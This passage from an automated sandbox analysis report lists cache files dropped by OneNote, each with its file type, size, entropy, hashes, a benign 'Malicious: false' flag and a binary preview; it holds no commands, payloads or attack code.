Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ...........tJ....c...x.)...tJ....c...x.).....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............;7...l....H3.6......N...^....................G.s...GS........f........................................I.qk..B.....LZ............;7...l....H3.6..........;7...l....H3.6..........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007Q.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	60924
Entropy (8bit):	7.758472758205366
Encrypted:	false
SSDEEP:	1536:kU7O7+CFqO6DkxTgPzo2wqggrrX8QvN1I/ZLBttB9+dPFXbc:hVuqJDaTqo2wq1L84N1I/Z1tT9X
MD5:	D58C51D2CF586A5E14A9EC8529C3B0A8
SHA1:	F4811A353797C29B1E3F5A61B125C46E1534D587
SHA-256:	F927C7825851974A2149868146970706523A49165133CEE6027A43E8C9ABDF27
SHA-512:	34B963173AFBDF07432F4B983D29F10376E4771FE666E9D50B1A81DA0B9F6001FD86B4A08B9711386DE153BF6E03C8E932E2D181C8EAF94EFF34D20FCA7570E0
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d................................................................................................!1AQ.aq....".....2B...Rbr#.s.4...3$.5u.6v..CSc...DT..f..t..&F........................!1..A.Qaq....."2....B.s....Rbr..#4...35...CSc.$...DTdt..%..............?....O<......X.O.Fg..{.W&u.u.T~.\|r;g!.._X..N.p.4.........................................................yK..xd...6..\|%....\j..e.=...Y..f..I.\|-....e...$R.j.......~.W#....{.....V.k.\|F..z^..:.~..f......"x.....L..K..r../.;..[..l...;.U...W...X.........8.....y?..B...m.......j..Q.g3..G.K....GL.o..n7a..Y..[.'.........x........\......~...f...0\Wc.n?k.\|.....1.ww;..2..?...r4uF.MXdB6..W..mG2NJ.E........u...2.q...Z..=(l)jU.X...U.\X.......O<......X.O.Fg..{.W&u.u.T~.\|r;g!.._X..N.p.4.......................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007R.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.286814487695656
Encrypted:	false
SSDEEP:	48:HnwsEvMbvAtOXEJtkEXSt/9xsDpyRrdMrz07FXGCA9VZr5:HnwsvbvAGE1XY9xKsRMQ7Qr
MD5:	AFE438B79770AB450396FE49D913A00B
SHA1:	B8F97105DFEFD9C9E7535A6540B176E7F45A57C9
SHA-256:	2B5E784ADCA330456B30C524263CD81AF061E997A27B980F798B71F08605684A
SHA-512:	7E44B0DDB55B2565A09E0CAB03701395B1BC69FB864A3495BDC519B9D7422329B61844256D3D37CBBD8314978B4F400382B90D819844AF5C3762B6F247062243
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ..............v.....w(-.......v.....w(-......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............Jz.E....a..loM....N...^...................._@......7.........f........................................I.qk..B.....LZ..............Jz.E....a..loM..........Jz.E....a..loM........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007S.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 39 x 579, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	515
Entropy (8bit):	6.740133870626016
Encrypted:	false
SSDEEP:	12:6v/7su2/c30mqkg9VgFHe7Ll8UmJX/N+1Zmkk8f3lbtI4:4mc38gFHe18lkk8f3lbth
MD5:	E96BE30D892A5412CF262FEE652921CA
SHA1:	8190A0BFE21D04BC6F3A406E91B87CA69C03A2DE
SHA-256:	0E31DA4DFCFF4A36C64C1CE940362D2309769F36369E4C43C317D5F2FA15658E
SHA-512:	D647F51ABBD013226A6ADD0D551D058C633F867F9AF5A9E099B85D6E291D220F7B85958B07381CD4C7C4F72356DBAFE2A86932AE398E28C56CDDF0744E92EE24
Malicious:	false
Preview:	.PNG........IHDR...'...C........b...`PLTE..................................................................................................bKGD....H....cmPPJCmp0712....H.s....9IDATx^..I..@.C..<..?mo.#C((.J}...~..B...b.I.i.\<.e.....(p.I.EO...q.x.......dRz....K..b0.:.<c.o..0.x\:...F....I&..ap....."P@....DO...q)p*..@Y.CL2)=......1.........4....._.G..^`..lDO...q...X....SL..z....K..#.L#..I6..ap.Ls.,....7&..ap.p..lI...,GO...q.....k.n1..4......3=.f.x.$..4.....o....x.$+..0.x\.,&6...............IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007T.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.313902642320062
Encrypted:	false
SSDEEP:	48:kRfsbLsbjtLzEPA83ZXJ9psXpyBrdMrVOF2mFXjsHIYog:kRfscbjFEP1XJ9peERMYF2mio
MD5:	157277BB217B9175AD90A1CC163AED24
SHA1:	33A4D34931927CFB510DFCA5BF26A42D18EB425B
SHA-256:	C8C8051BE98662945DF4C6975F6EB34B8CD332E00A1735DC6973FDE679D07C15
SHA-512:	286BC0F984853501B116ACA6A5CFBAD69084CD5467860A5D8EA0250EC474DAF87FCF9F48CF98295870E45370326320C1E25130A75790659B1C4FDE3E06B673D7
Malicious:	false
Preview:	2...>.......T...v...H...................................................................................................................................2...>...0.......v...\|............................I.......I.qk..B.....LZg.R.....g.R,.......A.n.Wg.R,.......A.n.Wg.R..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............-l.ea_"..f..)y{.....N...^....................I.@..T ..&........f........................................I.qk..B.....LZ............-l.ea_"..f..)y{.........-l.ea_"..f..)y{..........g.R.....g.R.....g.R.........................................g.Rj....g.RT.]..g.R.....g.R..B..g.RH....g.R..B..g.R..>.)g.R..J...................;........4...4...4.."..............g.R.g.R.g.R..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4.........g.R.....g.R....#g.R............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007U.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 30 x 700, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1547
Entropy (8bit):	6.4194805172468286
Encrypted:	false
SSDEEP:	24:dZeDNYbS+238CTUFPA6SXG5qSacX9q73eXu0vC3dU+OB2gbwHRuZ:dykp9FzBBacXQ3uNC3n7xuZ
MD5:	0BA36A74DFBF411FAB348404CCEC3348
SHA1:	4C619790E517416E178161028987DF1CD3B871CC
SHA-256:	2E7AAF26BEC32148B96442E8FFF1BD2CEF2D72630969F23B9A2ABEDB6CFEC93B
SHA-512:	90AF53DB7C413E2ADB970AC345F73E4ED8AF626E179C929E6560118F7A9E98DC7C5FF02B2B3F6C98D397E0FE2D85F3427C6928C328872149E176FA8A99E91F54
Malicious:	false
Preview:	.PNG........IHDR...............\....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................D......bKGD....H....cmPPJCmp0712....H.s.....IDATx^.WSTA........b.0gPPP0..E.9b@L(.c.N.U>..@......;...}..B.(....$......5..XS...I....).!....D^.uE...\..5........F."o..-...m.n. .^.....q= .

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007V.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.335017881177145
Encrypted:	false
SSDEEP:	96:GsMgLjTW+Lsy7fPERBXf5B9W0olRMvBjcSI:GsMgXTWqp78RBXf5B9TolRMvBjcS
MD5:	C5810F0A0E8D89F0AF1D1BBF11BF08DF
SHA1:	80FE9311B929B5945C6A842ACA3B88FB9972D458
SHA-256:	DA9F8ECB015DD195D5233CF87ADBF3DFBA1748A9B6DC15D305689AAB3D4433A4
SHA-512:	C26FCC160A28D4AC615EBE75BB41FC822785CFF545CA64CC6C74C61DCD7653C8E0EAF1630F86E9498104F4A34EC683615567E7982C9EC53D242B6A04AAB1DF2F
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ.............W..+.H.g........W..+.H.g........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............?E~ gL.?..t..%.....N...^..................^.5.H.t_.............f........................................I.qk..B.....LZ.............?E~ gL.?..t..%..........?E~ gL.?..t..%.........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000080.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	95763
Entropy (8bit):	7.931689087616878
Encrypted:	false
SSDEEP:	1536:EoES7mhTyzabUaE77xAOmq0zVruQlttNxlipxVWssMU2YhRy2v6pKKYhQzwMc2:zz7mhTyzabUa4b4xuQlttnlGx8x9h02M
MD5:	177DD42CA99CAA2CCBF2974221680334
SHA1:	35FD86B3DD082A6D4930C67BC0E05D3B5817465A
SHA-256:	525A857D0EDA855A64D3619DF58B1C2D013A73E60FA0D49B155ECFCB2C134C7C
SHA-512:	6FB6D9A6C97B1115C3246690A2F339CD612899AC25ACBA00296EAEAA0A1D094E7339D670969764FE23EB7C08FCDD01C6F78FBC0735D504D5E02AD342901719B3
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!..1AQa...q......."...2..B#Rb3..r$...6..C4....Ss%5...tu.c..Dd.EU7....................!.1.AQ..aq......"r..2...4Rb#3$B.Ss............?..H..dV....U..-..0]Cp.%O.Z.Y.e.=/.q.....j76.w@s...5.&&&5...n..w..>.1....;.vR..[.......=.......KtY]u3.g18...).r....&.IZ'.....g..4kY..X..b.......y<...r1........e.._...X...w....op.m%Jr31...S.Vo.._....OI\]....F..V-....\...2j..X.....y.p.$4.....&#..]..n.V..x..P...F..C.f....])..~..Z\.....,..#..v..v...2V.k.SuaydO../[.c._..oTV<Z.s.[...o.x..>....-....v...#....-.X..L.Z./#.XG.-.0......%w..H.@aZ....C.}...N~.;..R......5.D......I.... .R........s.>..ks....(...S...9....2=. :^.. p.+?(....$..Q..I.........=\|..`2. v..t......U.8.u.. ...'...*...2;u....& 3..$.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000081.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.318921545333139
Encrypted:	false
SSDEEP:	96:SsftZgvJq9Ey00Xv9CvcRMV2hCu375/LEKEvc:SsfvgvJry/Xv9ocRMVhuL5/L
MD5:	95F752F325DE4086602838E1D6F24750
SHA1:	5CE31D2063FA87782F57DE38F2F61962D9D1D041
SHA-256:	20778DCBEA98026EF6911417EAE0C092D19F2CFAE760ED47C30743C25C75E376
SHA-512:	356C5B09B8E1D9B208ACEB774423E8294F2CB2DD915E3580298E137AAD31EB00C498F438FC59387FCF5CCDC1AC39B6D4A92C4EF2D07C8987F6C2884380FDEA0A
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ./......./.9....8. q..I./.9....8. q..I./...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............^......(..r$....N...^...............a.z.g.P@.('.-.>d........f........................................I.qk..B.....LZ.............^......(..r$.........^......(..r$........../......./......./.........................................../.j...../.T.].../......./..B.../.H...../...B.../...>.)./...J...................;........4...4...4..".............../.../.../...z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4........../......./.....#./.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000082.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	67991
Entropy (8bit):	7.870481231782746
Encrypted:	false
SSDEEP:	1536:3PC0XJjsmsKuZRG1pXuZ6z3wARnV9AEnieCc7cllJcHJ:qyMBzkUZ0gq25c7Z
MD5:	1271B1905D18A40D79A5B9DB27EE97EA
SHA1:	9618608FBD7342DE6C71220A36C3F4995BA9C13E
SHA-256:	5B321A4D81BD499B289B1755F6450A42047C494DFBC112DBD56DA4CED2C15C1A
SHA-512:	C32DD26047F6B8AA061085B38AC2B8335868E1BFD8731DB65544309223A955FA4BF45B06AC8D244408658F51A1775B6F19FF0FFC804989DE706DE8EB36F1436F
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1..AQa..q..".........2...BR#b.r.3...$.'...)..C%7gw..(.S.W89.......................!1.A.Qa.q".....2...#....B.t......rc.$%67Rb3s&'CUu.v....S.d5.V4T.e.............?...?..Wj.e.e.......w/..E..eOw_.....6......u..C6h.,..;.g.D8Z..-)O..jy..e;.u.g..w..[.L""k'w.......'1'.[......=..P...S.9a.V./O....q=8xk]...........9......F...e9'....9.O.... .&.....p......c.4...mr...?.......L..'.....0....+..\|_...POM=7.?.2.a....};.Z..y./....>./.C.<...;.....\|.1>...........S.8.o.O...+..n2...k../.X..9...Y...:.....\...Dk......q.K..\.Wuh.!Z?.mu...R.5.A.S.h.0..[..v..+M.....aUi.k..?#..._...X..R.&]..[..;../]L..f..V.......e...ut&.#.J.5....c%..o.$..v.<K.6..T.IP.....6X.*.uf..t0^..-.)m$.!.q(.j.f;..WB6.b.B..R.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000083.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.348959926355703
Encrypted:	false
SSDEEP:	96:tb6sx5nsh1T+7QmzEdyXE9iQ61RM7Ep4f2jhQXT4+eD2ked:tb6sxhshR+edyXE9D61RM744f2jhQXTl
MD5:	1C922FF74E97BD0CFEBE7A634C982952
SHA1:	3E62367872FC226F23E0ADF5C416D80A131EC425
SHA-256:	F748C8BE14C2849CC4E06EEA77E38B8B087102D508364B058DA131D6F5474CE8
SHA-512:	B571EE69785D0D1A4EC77F74C96D7FD3820FADD029D3EFC85015C9D24D950FE430B4FCC1B46B6F8031CC66CEAD359283726F401702BB46E2237F6E687509174C
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................&.......&.2.#J.;...R.4..I.......I.qk..B.....LZ.&.2.#J.;...R.4..&...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'............._...]V..6w..Q.q%....N...^.................f...=B.....Xk........f........................................I.qk..B.....LZ............_...]V..6w..Q.q%........_...]V..6w..Q.q%..........&.......&.......&...........................................&.j.....&.T.]...&.......&...B...&.H.....&...B...&...>.).&...J...................;........4...4...4.."...............&...&...&...z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4..........&.......&.....#.&.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000084.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
Category:	dropped
Size (bytes):	22203
Entropy (8bit):	6.977175130747846
Encrypted:	false
SSDEEP:	192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
MD5:	2D3128554F6286809B2C8E99DE5FD3F6
SHA1:	FC42CB04151D36F448093BDEFE33031A9B8D797D
SHA-256:	14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
SHA-512:	D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
Malicious:	false
Preview:	......JFIF.....H.H.....XExif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&..................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000085.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.443169619142964
Encrypted:	false
SSDEEP:	96:cG7s5U8lMKPEDOXf92a0RMv85S7bvSZTp2:cG7su8d8DOXf950RMv8M
MD5:	DDDCF6C93F4756113E64C3779AFB0AEF
SHA1:	D8A7A9C57CE9037CEFD1DD75527AB2B2343DA9B6
SHA-256:	2ECAEB18286A0D381E870217D65C1E1CB345F5737E7B89742F3592CCF9B4DE25
SHA-512:	2063F40246EA81620438AE15A6A540B0A4F2C11CF004E39D907859F17B59D6DB4D432FA87340EC8B4F0F5695BEFA5558E78AE817BBC4A52BE7964D69F3F9AA9F
Malicious:	false
Preview:	2...>.......l...v...`...................................................................................................................................2...>...H.......v................................I.......I.qk..B.....LZrU......rU.q4..9.....prU.q4..9.....prU...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............."......4.[..%......N...^..................VPT.E..Z..\(.........f........................................I.qk..B.....LZ............."......4.[..%..........."......4.[..%...........rU......rU......rU..........................................rU.j....rU.T.]..rU......rU...B..rU.H....rU...B..rU...>.)rU...J...................;........4...4...4.."..............rU..rU..rU...z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4.........rU......rU.....#rU.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000086.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	15740
Entropy (8bit):	6.0674556182683945
Encrypted:	false
SSDEEP:	192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
MD5:	FFA5EC40DC9A0FD10EB9E6355142D6A6
SHA1:	3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
SHA-256:	D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
SHA-512:	6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.\|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000087.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.303440099836398
Encrypted:	false
SSDEEP:	48:asz1zgS12tHX11EAkLPEjzXXn91UrpyZrdMrEkSImCFXJ9fpA+d:asuS12lX3EjAzXXn9GrERMEkSIxvx
MD5:	EAD7B5E95A13E146FA731254F6C4F36B
SHA1:	E26F82D6A9515ABE3C9DC579B80F7AC9747C3C78
SHA-256:	C11C7A28EC607B2EEC50277479875F73F3D46FE066B7CDFE652D118C368B0DC9
SHA-512:	6849CE7B25BE5170502685EDDCB45C46F5DCB756ED22EA8BD3524C958FC905E41BDA4990F0F258786D09197C3BF99BB34D90A244A8796B289A30BCE2A67CCDAF
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>..........v...v............................I.......I.qk..B.....LZ..................r....$..........r....$.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............9..9..@....YL....N...^......................J.,L.............f........................................I.qk..B.....LZ..............9..9..@....YL..........9..9..@....YL........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000088.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	86187
Entropy (8bit):	7.951356272886186
Encrypted:	false
SSDEEP:	1536:AbmHwD7za0syWMetp3TdPFzoJamVdAQZCiUit9qbYN6LerhWMzIWgN1EeaYhJM:1QnzsyTeP3TPAdAQZCi5qbYEKrhWWMNO
MD5:	FEE4785DF76E93A9DC2F4501CBAEAE12
SHA1:	8FB4527BDE05EF208FCDB168098A07707C27501F
SHA-256:	F091DED5E283AF6848670A3172E7C43C6099875D39B3FC69C2BDBA914F609602
SHA-512:	7E99D33151A0D3873D6A819C98EA8E62D928C087B7BA2080F11C7BCF746AD60A44D4FF6EE3D2D2E8DFA4BF1FC6285ED56BB83F91C2FC6FC4FDFF2000105F10B1
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................1.!Aq...Qa."...2..BR#...br......6v.7..3.CSc...$4.s..&dt%u.f.......................!1.AQ..aq........"2.B#....Rb3..t.5u.67.8.r..$....C4.cs.Sd%.DEUe&.............?............w.....c.....i.A.....3...7.......7..P......%.........?Th..l./?.;.....$}..=5Oa...F.c.A/...D.D..]..y..3e.5\%.fo2.X.]q.5Ee.}..i..md.T....#...-...Mu...9...-+..~w5O.);..G..'.;..).....A_...M.vV..y.q......,<.3.(...._K:..XM.......w.......9..T.......?b..a-%.c;.}..>....\|.,lZKCEB.t...fw\|.Sw^..Y..:.J.................t._P..v..j.1.R8.R....G..WH<(Xi........i..xcu...WM.dqM>'W..g....M.q.....+.....b'..~....>..T.~Jc....fj.X.x..9...N.w.6:..>.......&.(h..u...t._...)_k#7Za...cZ....P...Y..;.V.,..xo.....f........Y...\6...M'L._

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000089.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.64941333451561
Encrypted:	false
SSDEEP:	96:4stdeS95JpEtUBJRXsT9yvvsRM9YyUCsJ:4stV954KnRXI940RM9YyUCc
MD5:	1B8377A482637CD9ED97C6154C79BF3C
SHA1:	764256B8A7420299977C6120CCF045C14DAC6201
SHA-256:	9D1AD86CC6CB88C032423C5B36B91E220D83E1EE6E1743CB41EF43F4654F0F59
SHA-512:	5962B885989829D0DBABEC969D1633D64DECF49AF0F409BFBF1E78E4FF0A8C446FEABCE3703BEAE60F372E603DA4AE1ED5DA4F72E1DD4E318DEB8CFF06589F9E
Malicious:	false
Preview:	2...>...........v.......................................................................................................................................2...>...t.......v...............................R.......R..n2G.......-1.I.......I.qk..B.....LZR..n2G.......-1R....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............q......[..3~.~....N...^.................L`...@.>j............f...................................H....I.qk..B.....LZ..............q......[..3~.~..........q......[..3~.~.........R.......R.......R...........................................R..j....R..T.]..R.......R....B..R..H....R....B..R....>.)R....J...................;........4...4...4.."..............R...R...R....z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4.........R.......R......#R..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008A.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 85 x 470, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	11197
Entropy (8bit):	7.975073010774664
Encrypted:	false
SSDEEP:	192:p9wNdtRKcVHso6zsqm06xaqZdingVzLZ7/PGSIz/yycRTbChh/JzhbEx15RGb:mdtMcVHqgAqTinMzLZ7/uSIz/yTR/mhF
MD5:	DDC3CC30794277500EFE4BC6667EC123
SHA1:	EFC9642C1F95B5FC38764476AE481649C016FA0C
SHA-256:	7F5B660A1A0BF46C75AAF19B4F77A0E086DE003EC03AFC1F58D871D55AA5BA9E
SHA-512:	25232A84604C3959634D33090238FEC8D51E40AD84EB3A08BB8522A81BE1E83378649C014E98E1DFCDF46B7BFAC92D8D2429211CD11D7EE0334C9C3DF7C1B6A6
Malicious:	false
Preview:	.PNG........IHDR...U.........1x5.....PLTE....................................e........................................................s...............x..........................o..............................................................................................................................................................~.............................m...............................................j...............................................p.......z......................................................x..............\|........................................v.......................y..........................................................h...........................................................................P..{....bKGD....H....cmPPJCmp0712....H.s...(SIDATx^.}i@S..N....h...!..)....AI%..p.L."a..)..`U..,h..:O.b.:.j+.Z).b..zN.s..{O...&\|..N}...${....~.....k}.[k}{.o^.D_..W:35ly..7rL....6n0.A...b

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008B.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.31892867204098
Encrypted:	false
SSDEEP:	48:esjwdK2xR6tQifJElLdTcX3ndj0c9FUTpy9rdMruLDmFXXppcVpu1:esAK2xR6JElBcX3x0c9WTwRMWm5Qu
MD5:	3186D72CE32C5139FF31C8D0A5517794
SHA1:	D9B16EA014A44DBFBA6457FBA4FC63A246843944
SHA-256:	3E24934E544F1063DAB10198F0D528B9EB8AD254870897F41BEF758515C167AE
SHA-512:	C135045E56D0F056D91A91663B6C78C2AEA3DBF39C357DD56B43832F0842474BEA594F2FB9CCC9F0E7FBF4AA6E8CCFC6E992A9B542F5B85A4666789E407B9734
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v...........................`.......`...4.....\..5...I.......I.qk..B.....LZ`...4.....\..5..`....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............-....Z...tQ..+....N...^.....................L...i..$O........f........................................I.qk..B.....LZ.............-....Z...tQ..+.........-....Z...tQ..+.........`.......`.......`...........................................`..j....`..T.]..`.......`....B..`..H....`....B..`....>.)`....J...................;........4...4...4.."..............`...`...`....z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4.........`.......`......#`..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008C.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 88 x 574, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	19920
Entropy (8bit):	7.987696084459766
Encrypted:	false
SSDEEP:	384:DRSgtAxJx7bzvAsVSqQElOT4uHmpmvNYT9aPU+QtsC2LgfIqJZnbeyRB:DsgaN7bzvAsVdK4uGQFUZ6bU/p3
MD5:	1BDAD9B3B6DE549162F9567697389E1C
SHA1:	5D9C09159F07A3A9BDCC6C4B9BD9CB72D0184E6F
SHA-256:	0908A4CFA23F93011176D47F45843E9CA2973030421996E8E27484781F54B0EC
SHA-512:	475040779AC247BB5C3E11862FB55FBDDFA12D759EE86A33E11BC1F3B656D6CD0F9B25146C0113E43E1D8001D8867D3BC3BF7E6FE21F3A0016CB1F8B70B7A15A
Malicious:	false
